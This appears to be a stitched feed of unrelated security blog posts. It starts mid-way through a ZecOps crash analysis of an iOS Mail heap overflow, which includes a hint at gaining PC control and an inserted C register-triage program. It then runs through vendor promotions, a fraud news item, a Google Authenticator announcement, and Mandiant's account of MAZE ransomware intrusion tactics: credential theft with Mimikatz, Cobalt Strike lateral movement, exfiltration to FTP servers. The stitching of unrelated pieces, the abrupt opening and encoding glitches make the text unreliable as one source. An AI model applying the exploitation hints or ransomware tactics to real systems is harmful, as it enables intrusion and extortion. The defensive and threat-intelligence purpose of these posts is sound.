10  libsystem_pthread.dylib       	0x00000001b0e40cd4 start_wqthread  + 4 


Thread 13 crashed with ARM Thread State (64-bit):
    x0: 0x0041004100410041   x1: 0x00000001de1ac18a   x2: 0x0000000000000000   x3: 0x0000000000000010
    x4: 0x00000001b0c60388   x5: 0x0000000000000010   x6: 0x0000000000000000   x7: 0x0000000000000000
    x8: 0x0000000281f94090   x9: 0x00000001b143f670  x10: 0x0000000142846800  x11: 0x0000004b0000007f
   x12: 0x00000001428468a0  x13: 0x000041a1eb487861  x14: 0x0000000283ed9d10  x15: 0x0000000000000004
   x16: 0x00000001eb487860  x17: 0x00000001b11191b0  x18: 0x0000000000000000  x19: 0x0000000281dce4c0
   x20: 0x0000000282693398  x21: 0x0000000282693330  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000281dce4c8  x25: 0x000000000c000000  x26: 0x000000000000000d  x27: 0x00000001eb48e000
   x28: 0x0000000282693330   fp: 0x000000016b8fe820   lr: 0x00000001b1119408
    sp: 0x000000016b8fe820   pc: 0x00000001b040fca0 cpsr: 0x20000000

[a]: The pointer to the object was overwritten with “0x0041004100410041”, which is “AAAA” in Unicode (UTF-16).

[b] is one of the instructions around the crashed address that we added for better understanding. The process crashed on the instruction “ldr x8, [x0]” while -[__NSDictionaryM removeAllObjects] was trying to release one of the objects.

By reverse engineering -[__NSDictionaryM removeAllObjects], we understand that register x0 was loaded from x28 (0x0000000282693330), since register x28 was never changed before the crash.

Let’s take a look at the virtual memory region information for x28 (0x0000000282693330): the overwritten object was stored in the MALLOC_NANO region, which stores small heap chunks. The heap overflow vulnerability corrupts the same region, since it overflows an 8-byte heap chunk that is also stored in MALLOC_NANO.

  MALLOC_NANO         	 0x0000000280000000-0x00000002a0000000	 rw-/rwx

This crash is actually pretty close to controlling the PC, since it controls the pointer to an Objective-C object. By pointing register x0 at memory sprayed with a fake object and a class with a fake method cache, attackers could control the PC; this Phrack article explains the details.
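Added example, not part of the ZecOps post: a small C triage pass over thread-state register dumps that looks for the three signs the analysis above relies on: values whose eight bytes are all printable ASCII (x8-x15 in Case 1), values that decode as UTF-16 text (“AAAA” in Case 2), and pointers inside the MALLOC_NANO range quoted above. The sample dump is constructed from the two thread-state listings; the function names are assumed.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* MALLOC_NANO bounds as listed in the region info above. */
#define MALLOC_NANO_START 0x0000000280000000ULL
#define MALLOC_NANO_END   0x00000002a0000000ULL

/* Flags a register value can earn during triage. */
enum reg_flag {
    REG_ASCII = 1,   /* all eight bytes are printable ASCII (x8-x15 in Case 1) */
    REG_UTF16 = 2,   /* four UTF-16 units of printable ASCII ("AAAA" in Case 2) */
    REG_NANO  = 4    /* points into MALLOC_NANO, where the 8-byte chunk lives */
};

static int all_printable_bytes(uint64_t v) {
    for (int i = 0; i < 8; i++) {
        unsigned c = (unsigned)((v >> (8 * i)) & 0xff);
        if (c < 0x20 || c > 0x7e) return 0;
    }
    return 1;
}

static int all_utf16_ascii(uint64_t v) {
    for (int i = 0; i < 4; i++) {
        unsigned u = (unsigned)((v >> (16 * i)) & 0xffff);
        if (u < 0x20 || u > 0x7e) return 0;
    }
    return 1;
}

/* Classify one 64-bit register value; 0 means nothing noteworthy. */
unsigned classify_value(uint64_t v) {
    unsigned f = 0;
    if (all_printable_bytes(v)) f |= REG_ASCII;
    if (all_utf16_ascii(v))     f |= REG_UTF16;
    if (v >= MALLOC_NANO_START && v < MALLOC_NANO_END) f |= REG_NANO;
    return f;
}

/* Walk "name: 0xvalue" pairs in a thread-state dump, printing each flagged
 * register. Returns the number of flagged registers. */
int triage_thread_state(const char *dump) {
    int flagged = 0;
    const char *p = dump;
    char name[8];
    while (*p) {
        while (*p && isspace((unsigned char)*p)) p++;     /* skip whitespace */
        if (!*p) break;
        size_t n = 0;                                      /* register name up to ':' */
        while (*p && *p != ':' && !isspace((unsigned char)*p) && n < sizeof name - 1)
            name[n++] = *p++;
        name[n] = '\0';
        if (*p != ':') {                                   /* not a "name:" token */
            while (*p && !isspace((unsigned char)*p)) p++;
            continue;
        }
        p++;                                               /* skip ':' */
        while (*p && isspace((unsigned char)*p)) p++;
        char *end;
        uint64_t v = strtoull(p, &end, 16);                /* accepts the 0x prefix */
        if (end == p) continue;
        p = end;
        unsigned f = classify_value(v);
        if (f) {
            flagged++;
            printf("%-4s 0x%016llx ->%s%s%s\n", name, (unsigned long long)v,
                   (f & REG_ASCII) ? " ascii-bytes" : "",
                   (f & REG_UTF16) ? " utf16-text" : "",
                   (f & REG_NANO)  ? " malloc-nano" : "");
        }
    }
    return flagged;
}

/* Constructed excerpt combining registers from the Case 1 and Case 2 dumps. */
static const char *SAMPLE_DUMP =
    "    x0: 0x000000004a35630e   x1: 0x00000001149af432   x2: 0x0000000000001519\n"
    "    x8: 0x44423d30443d3644   x9: 0x443d30443d38463d  x10: 0x3d31413d31443d30\n"
    "    x0: 0x0041004100410041  x28: 0x0000000282693330   pc: 0x00000001b040fca0\n";

int main(void) {
    int n = triage_thread_state(SAMPLE_DUMP);
    printf("%d register(s) flagged\n", n);
    return 0;
}
```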

Summary

  1. It is rare to see user-provided inputs trigger and control remote vulnerabilities.
  2. We prove that it is possible to exploit this vulnerability using the described technique.
  3. We have observed real-world triggers with a large allocation size.
  4. We have seen real-world triggers with values that are controlled by the sender.
  5. The emails we looked for were missing / deleted.
  6. The success rate can be improved. This bug had in-the-wild triggers in 2010 on an iPhone 2G device.
  7. In our opinion, based on the above, this bug is worth an out-of-band patch.

How Can Apple Improve the Logs?

The lack of detail in iOS logs, and the lack of options to choose the granularity of the data, for both individuals and organizations, need to change for iOS to be on par with the capabilities of macOS, Linux, and Windows. In general, the concept of hacking into a phone in order to analyze it is completely flawed and should not be the normal way to do it.

We suggest Apple improve its error diagnostics process to help individuals, organizations, and SOCs investigate their devices. We have a few helpful technical suggestions:

  1. Crash report improvement: make it possible to see the memory next to each pointer / register
  2. Crash report improvement: show stack / heap memory / memory near registers
  3. Add PIDs/PPIDs/UID/EUID to all applicable events
  4. Ability to send these logs to a remote server without physically connecting the phone – we are aware of multiple cases where the logs were mysteriously deleted
  5. Ability to perform complete digital forensics analysis of suspected iOS devices without a need to hack into the device first.

Questions for Apple

  • How many triggers have you seen to this heap overflow since iOS 3.1.3? 
  • How were you able to determine within one day that none of the triggers of this bug were malicious, and did you actually go over each event?
  • When are you planning to patch this vulnerability?
  • What are you going to do about enhancing forensics on mobile devices (see the list above)?

MailDemon Bounty

If you experienced any of the three symptoms below, use another mail application (e.g. Outlook for Desktop) and send the relevant emails (including the email source) to the address maildemon@zecops.org; there are instructions at the bottom of this post.

Suspected emails may appear as follows:

Bounty details: We will validate whether the email contains exploit code. For the first two submissions containing Mail exploits verified by the ZecOps team, we will provide:

  • $10,000 USD bounty
  • One license for ZecOps Gluon (DFIR for mobile devices) for 1 year
  • One license for ZecOps Neutrino (DFIR for endpoints and servers) for 1 year. 

We will provide an additional bounty of up to $7,337 for an exploit primitive as described above.

We will determine the first two valid submissions according to the date they were received by our email server and whether they contain exploit code. In total: $27,337 USD in bounties, plus licenses of ZecOps Gluon & Neutrino.

For suspicious submissions, we would also request device logs in order to determine other relevant information about potential attackers exploiting vulnerabilities in Mail and other vulnerabilities on the device.

Please note: not every email that causes the symptoms above and is shared with us will qualify for a bounty, as there could be other bugs in MobileMail/maild; we are only looking for ones that contain an attack.

How to send the emails using Outlook:

  1. Open Outlook from a computer and locate the relevant email
  2. Select Actions => Other Actions => View Source
  3. Send the source to maildemon@zecops.org

How to send the suspicious email via Gmail:

  1. Locate and select the relevant message
  2. Click on the three dots “…” in the menu and click on Forward as an attachment
  3. Send the email with the “.eml” attachment to maildemon@zecops.org

* Please note that we haven’t published all details intentionally. This bug is still unpatched and we want to avoid further misuse of this bug.


Mirror Mirror On The Wall, Is My Cloud The Most Secure?

What is the value of your cloud security investment?

How does your cloud security measure up with industry peers?

Amongst all the cloud security measures available, where should you get started?

Do you think nothing short of magic will help answer these questions? If you answered YES! to any of the above questions, read on.

Cloud Adoption is Mainstream!

Cloud computing has evolved from being a market disruptor to the expected approach for IT. Today, businesses are evolving from being “cloud-first” to “cloud-only”. According to the McAfee Cloud Adoption and Risk Report 2019, 87% of enterprises said they experienced benefits from the cloud that helped drive business acceleration.

Need for Cloud Security Solutions is Paramount!

With businesses moving more sensitive data into the cloud, the need for cloud security solutions is paramount. Consider this: the average cost of a data breach for the US is $8.19 million [1]! The cost of loss of reputation, non-compliance or credibility is immense. Businesses recognize this truth and the need for cloud security as part of their cloud adoption journey. As organizations adopt new infrastructure and software, cloud security spending is continuing to increase. By 2023, spending on global cloud security solutions is expected to reach $12.7 billion, according to the Forrester Analytics: Cloud Security Solutions Forecast, 2018 To 2023 (Global) report [2].

So, does IT really need a magical mirror to help answer foundational questions like measuring the value of their cloud security spending?

McAfee MVISION Cloud has the Answer!

McAfee MVISION Cloud, a leading Cloud Access Security Broker that provides comprehensive visibility and control across enterprise SaaS, PaaS, and Infrastructure as a Service environments, and the MVISION Cloud Security Advisor (CSA) might just have the answer!

Join us for a live webinar with Kima Hayuk, Senior IP Protection Manager for Electronic Arts and Thyaga Vasudevan, Head of Product, MVISION Cloud, McAfee.

When: May 14th, 10 AM PST | 10 AM SGT | 1:00 PM BST

Where: Register here Mirror Mirror On The Wall, Is My Cloud The Most Secure?

What:

  1. Learn about Electronic Arts’ cloud journey and how McAfee MVISION Cloud helps address their complex cloud security requirements
  2. Introducing MVISION CSA and how it works:
    • CSA as a tool to measure your cloud security maturity and risk posture
    • CSA as a tool to measure the value generated by your cloud investment
    • CSA as a tool to measure your cloud security posture vs. industry peers
    • CSA as a tool to get a list of unique and actionable recommendations to guide on your cloud journey.

Join us to learn more about what customers and analysts are calling a game changer!

[1] https://www.ibm.com/security/data-breach

[2] Forrester Analytics: Cloud Security Solutions Forecast, 2018 To 2023 (Global) report, 1 April 2019, Jennifer Adams, Andras Cser and Sanjeev Kumar

The post Mirror Mirror On The Wall, Is My Cloud The Most Secure? appeared first on McAfee Blogs.

Great Minds Think Alike: Aligning Security With Business Priorities

Do you ever feel like security and risk professionals have a completely different set of priorities than the rest of the business? Well, that’s because, at most companies, they do. Security professionals are concerned with securing things (servers, networks, and applications) from cyber risks. Business decision-makers are concerned with the customer experience, growing revenue, and innovation.

Forrester addresses this discrepancy in a recent report, citing that, “Only 16 percent of global security decision makers at enterprises claim that they are identifying new sources of data-driven revenue, and just 14 percent are developing secure customer-facing mobile and web applications.”[1]

The difference in priorities can have a negative impact on a business. For example, by concentrating solely on the security of products and services, security professionals fail to protect against new attacks that focus on how to manipulate decisions made by or about your company or the perception of your products and services. These types of attacks are commonly associated with innovation, so businesses are often fearful that innovative software will expose the company to risk. But innovation is the only way for a company to progress and stay relevant. So, it’s kind of a catch-22.

How can you solve this dilemma? You need security to align with the business priorities, which means security has to concentrate on the customer experience. Just as development is creating minimum viable products, security must match it with minimum viable security. If security and development are aligned, it will open the door to innovation, making security a competitive advantage.

To learn more about this concept, including ways to shift the security mindset, watch the following video featuring Amy DeMartine based on a recent Forrester report she co-authored, Secure What You Sell: CISOs Must Tackle Product Security to Protect Customers.

[1] “Secure What You Sell: CISOs Must Tackle Product Security To Protect Customers,” by Jeff Pollard, Amy DeMartine with Laura Koetzle, Elsa Pikulik, Peggy Dostie, Forrester Research, Inc.

NIST Introduces Framework for Secure Software Development

NIST Cybersecurity recently published a whitepaper outlining software development practices, known collectively as a secure software development framework (SSDF), that can be implemented into the software development lifecycle (SDLC) to better secure applications. The outlined practices are based on pre-established standards and guidelines as well as software development practice documents.

NIST Cybersecurity states that, if properly implemented, the SSDF practices should “help software producers reduce the number of vulnerabilities in released software, mitigate the potential impact of the exploitation of undetected or unaddressed vulnerabilities, and address the root causes of vulnerabilities to prevent future recurrences.”

Some of the key tasks outlined in the framework include:

Provide secure code training

Most developers aren’t formally trained in writing secure code. If you take the time to train developers, and any other individuals with responsibilities that contribute to secure development, they’ll be able to write secure code from the start. If code is secure from the start of the development phase, it eliminates rework and speeds the time to deployment.

To ensure successful training on secure code practices, tailor the training to specific roles, document the desired outcomes, and review the training plans periodically.

Automate and integrate security tests

By leveraging automatic testing methods instead of using a manual process, you can improve consistency, accuracy, and comprehensiveness. For human-readable code, like source code, NIST Cybersecurity recommends using a “static analysis tool to automatically check code for vulnerabilities and for compliance with the organization’s secure coding standards.” The static analysis tool should be used to “remediate documented and verified unsafe software practices on a continuous basis as human-readable code is checked into the code repository.”

For executable code (binaries, directly executed bytecode, and directly executed source code), NIST Cybersecurity recommends integrating “dynamic vulnerability testing into the project’s automated test suite.” And, if resources are available, “incorporate penetration testing to simulate how an attacker might attempt to compromise the software in high-risk scenarios.”

Once you’ve selected your application security tests, they should be integrated into the developers’ existing workflows and processes. NIST suggests “configuring the toolchain to perform automated code analysis and testing on a regular basis.” And, since the tests will produce a long list of vulnerabilities and flaws, you need to put a process in place to assess, prioritize, and remediate the flaws. The longer you wait to remediate flaws, the longer cyberattackers have to exploit the application.

Use open source code securely

Open source code, and all other third-party code, is still susceptible to vulnerabilities and flaws. Start by seeing if there are any publicly known flaws in the software modules that the vendor failed to fix. Then check to see if the module is being actively maintained for new vulnerabilities. If it isn’t being actively maintained, determine a plan of action for how you are going to test the code, and “use the results from commercial services for vetting the modules and services.”

To learn more, download the NIST Cybersecurity whitepaper, Mitigating the Risk of Software Vulnerabilities by Adopting a Secure Software Development Framework (SSDF). Or, to find out how Veracode can help you address the practices identified in the whitepaper, visit our product page.

Evaluating and Selecting AppSec Vendors to Fit Your Business Needs

Application security (AppSec) has seen quite an uptick over the last 10 years, with no signs of slowing down. When your organization is ready to tackle the challenge of building a strong AppSec program, you may find yourself wondering where to plug in various tools and solutions, and even where to start with comparing AppSec vendors.

How can you properly evaluate the marketplace and select the right solutions for your organization’s needs? Consider a framework that combines developer enablement with AppSec governance for an approach that covers the needs of modern software development without breaking the bank. Here’s a guide on what to look for when assessing potential vendors to determine whether they’re the right fit for your business.

Range of scanning and testing technologies

Overcoming challenges in DevSecOps means the ability to scale up and scale down as needed. It also entails empowering developers to fix security issues on their own and easing efficiency with automated solutions.

As no one single tool can act as a window into the health of your AppSec, it’s important to choose a vendor that offers several scanning and testing technologies with the ability to scale and automate from anywhere to bolster dispersed workforces. At the heart of developer enablement and AppSec should live comprehensive analysis tools with solutions like the following:

  • Static Analysis (SAST): This test process is performed without executing the program, but rather by examining the source code, byte code or application binaries for signs of security vulnerabilities.
  • Software Composition Analysis (SCA): This testing type identifies vulnerabilities in open source libraries that your team has included in the code.
  • Interactive Application Security Testing (IAST): IAST uses an agent inside the application or runtime environment that observes where an application could be exploited when executed.
  • Dynamic Analysis (DAST): Dynamic application security testing (DAST) looks at the application from the outside in, by examining it in its running state and trying to manipulate it in order to discover security vulnerabilities. The dynamic test simulates attacks against a web application and analyzes the application’s reactions, determining whether it is vulnerable.
  • Penetration Testing: A solution that goes beyond automated testing for a manual assessment of the health of your code.

Note: Run an evaluation of the tools with your own applications, not standardized benchmark applications. Some vendors optimize results for benchmarking applications but deliver far worse results or require extensive tuning for custom apps. Insist that you will scan your own apps and want to be present for any tuning that needs to occur so that you can estimate the effort per application.

SaaS vs. on-prem solutions

When surveying options for vendors, it’s important to decide whether cloud-based SaaS solutions or on-premises tools are the better fit. On-prem tools that require installation, setup time, training, and maintenance are typically not easy to scale and are more expensive, requiring a surplus of skills and time. That means organizations are slower to start scanning and securing their applications.

Cloud-based services, however, do not require businesses to buy tools and go through the process of installation and continued maintenance or patching. There is also less of a responsibility for the accuracy of detection as that falls on the vendor and little to no downtime in running scans and receiving results that guide DevSecOps programs. When a vendor offers SaaS solutions in the cloud, they handle the deployment and upkeep swiftly so that organizations can start scanning from day one and don’t have to worry about AppSec tools weighing on their processes (or servers) as they scale up and scale down.

AppSec governance solutions

Three of the key factors for AppSec governance include defining your program to achieve specific goals, scaling your program through best practices learned along the way, and proving the value of your AppSec solution. Good AppSec governance tools directly impact remediation management by informing decisions your security and development teams make, while also helping your organization meet compliance needs. Vendors that are thoughtful about AppSec governance offer solutions including:

  • Policy and Reporting: Your AppSec vendor should have policy and reporting tools that provide a clear report on progress to help set goals, define SLAs, and meet compliance requirements.
  • Remediation Management: Remediation management solutions enable your organization to fix found flaws quickly.
  • Analytics: It’s important for your AppSec vendor of choice to offer analytics tools that provide clear insight into metrics to help you manage and mature your DevSecOps programs, as well as demonstrate success.

Developer enablement resources

Developer enablement is critical to the success of your DevSecOps program, as developers are the ones creating secure code. Resources designed for enablement will help developers find and fix flaws faster, as well as reduce the introduction of new flaws. If your vendor of choice offers these resources to developers, you’ll have an easier time opening a door of communication between development and security to shift AppSec left earlier in the development process. Focus on vendors that offer:

  • Integrations: Ask potential vendors how they would handle integrations with your development pipeline, and what their range of compatible integrations looks like.
  • Training: Vendors that offer developer training through real-time feedback while coding, workshops, and hands-on learning care about empowering your developers to write more secure code. Ask potential vendors what they offer for training materials, including programs that provide real-world experience breaking and fixing applications.
  • Remediation Guidance: Remediation guidance is an essential part of developer enablement and ongoing training. Ask potential vendors what they offer for in-context guidance and one-on-one expert advice when it comes to your specific application types, and the programming languages your developers use most.

The numbers

Have a discussion with potential vendors about numbers that can shed light on their business wellbeing and, ultimately, the impact it will have on your organization’s investment. To understand whether a potential vendor has the fortitude to meet your business needs, ask the following questions:

  • How financially stable is this vendor?
  • Will the vendor exist in the market in five to 10 years?
  • What is the vendor’s market share?

You can get a pulse on a potential vendor???s standing in the market by looking at its:

  • Revenue numbers
  • Number of customers
  • Number of scans completed
  • Reputation among its audience
  • History and track record of success
  • Innovation and breadth of offerings

Finally, take a look at how much money potential vendors charge, and how much they’ll cost you in the long run:

  • What is the price per unit (tool, scan, etc.)?
  • Carefully compare SaaS vs. on-prem solutions: the operational costs of on-prem solutions can be significant and should be scoped out before signing the paperwork.
  • Can you consolidate various scan types into one vendor to reduce effort and get package deals?
  • Does the solution require tuning of applications, maintenance, and operations? What is the labor cost associated with this?

Finding a vendor that fits the bill

Be prepared to approach each of your top options for vendors with questions about their suite of solutions and how they can fit into your existing processes. Look for vendors that offer multiple testing types like SAST, DAST, and SCA for a well-rounded approach to your application security.

Equally as important is finding a vendor with SaaS-based solutions in the cloud so that you won’t have to delay projects or spend time waiting for maintenance down the road. If you can find all the above in a price range that fits your budget, you’ll be well on your way to more secure applications that keep you, and your customers, safe.

Learn more about AppSec best practices, and how to get started, in our new guide, AppSec Best Practices vs. Practicality.

Early access to superannuation paused as police freeze $120,000 in allegedly stolen funds

‘Sophisticated’ identity theft attack leads to Australian Tax Office stopping early super withdrawals until Monday

Allegations of identity theft involving 150 Australians have forced the government to pause the early release of superannuation, after police froze $120,000 believed to have been ripped off from retirement savings.

On Friday the assistant treasurer, Michael Sukkar, announced the Australian Tax Office would pause requests for early access of superannuation until Monday “out of an abundance of caution” to consider further anti-fraud protection.


Introducing portability of Google Authenticator 2SV codes across Android devices

Today is World Password Day, and we found it fitting to release an update that'll make it even easier for users to manage Google Authenticator 2-Step Verification (2SV) codes across multiple devices. We are introducing one of the most anticipated features: allowing users to transfer their 2SV secrets, the data used to generate 2SV codes, between devices that have Google Authenticator installed, for instance when upgrading from an old phone to a new one. This feature has started rolling out and is available in the latest version (5.10) of Google Authenticator on Android.

Transferring accounts from one device to another with Google Authenticator

Using 2SV, 2-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is critical to protecting your accounts from unauthorized access. With these mechanisms, users verify their identity through their password and an additional proof of identity, such as a security key or a passcode.

Google Authenticator makes it easy to use 2SV on accounts. Instead of supplying only a password when logging in, a user also enters a code generated by the Google Authenticator app on their phone. This is a safer alternative to passcodes sent via text message, and it is used by millions of users.

Users place their trust in Google Authenticator to keep their accounts safe. As a result, security is always a high priority. We made several explicit design decisions to minimize the attack surface while increasing the overall usability of the app. 
  • We ensured that no data is sent to Google’s servers during the transfer -- communication is directly between your two devices. Your 2SV secrets can’t be accessed without having physical access to your phone and the ability to unlock it.
  • We implemented a variety of alerting mechanisms and in-app logs to make sure users are aware when the transfer function has been used.

You can find more information about Google Authenticator and its usage guide here.

Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents

Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

Victimology

We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector, including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government, has been impacted, demonstrating the indiscriminate nature of these operations (Figure 1).

Figure 1: Geographical and industry distribution of alleged MAZE victims

Multiple Actors Involved in MAZE Ransomware Operations Identified

Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers partner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement, each of whom appears to work on a percentage basis. Notably, in some cases, actors may be hired on a salary basis (rather than commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.

Figure 2: MAZE ransomware panel

MAZE Initially Distributed via Exploit Kits and Spam Campaigns

MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.

Figure 3: German-language lure

On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United States. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.

Figure 4: AT&T email lure

Figure 5: Canada Post email lure

Shift to Post-Compromise Distribution Maximizes Impact

Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.

Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented, meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that can occur because numerous, disparate actors are involved in different phases of these operations. Notably, the time between initial compromise and encryption has also varied widely, from weeks to many months.

Initial Compromise

There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following is a sample of observations from several Mandiant incident response engagements:

  • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
  • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account's password.
  • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
  • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

Establish Foothold & Maintain Presence

The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have observed an actor create their own domain account to enable later-stage operations.

  • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
  • Web shells were deployed to an internet-facing system. The system-level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
  • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
  • An actor created a new domain account and added it to the domain administrators group.

Escalate Privileges

Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases by the use of Bloodhound and by more manual searches for files containing credentials.

  • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
  • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
  • The actor attempted to identify hosts running the KeePass password safe software.
  • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
  • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts to understand the impacted organization's Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

Reconnaissance

Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents perhaps best highlight the divergent ways in which the responsible actors interact with victim networks.

  • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
  • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
  • Preliminary network reconnaissance was conducted using a batch script named '2.bat' which contained a series of nslookup commands. The output of this script was copied into a file named '2.txt'.
  • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
  • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
  • An actor employed the adfind tool and a batch script to collect information about the victim's network, hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z' using an instance of the 7zip archiving utility named 7.exe.
  • An actor used the tool smbtools.exe to assess whether accounts could log in to systems across the environment.
  • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.

Lateral Movement

Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

  • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate RDP sessions to enable both lateral movement and privilege escalation.
  • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
  • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
  • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

Complete Mission

There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various ways (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

  • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
  • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
  • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
  • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
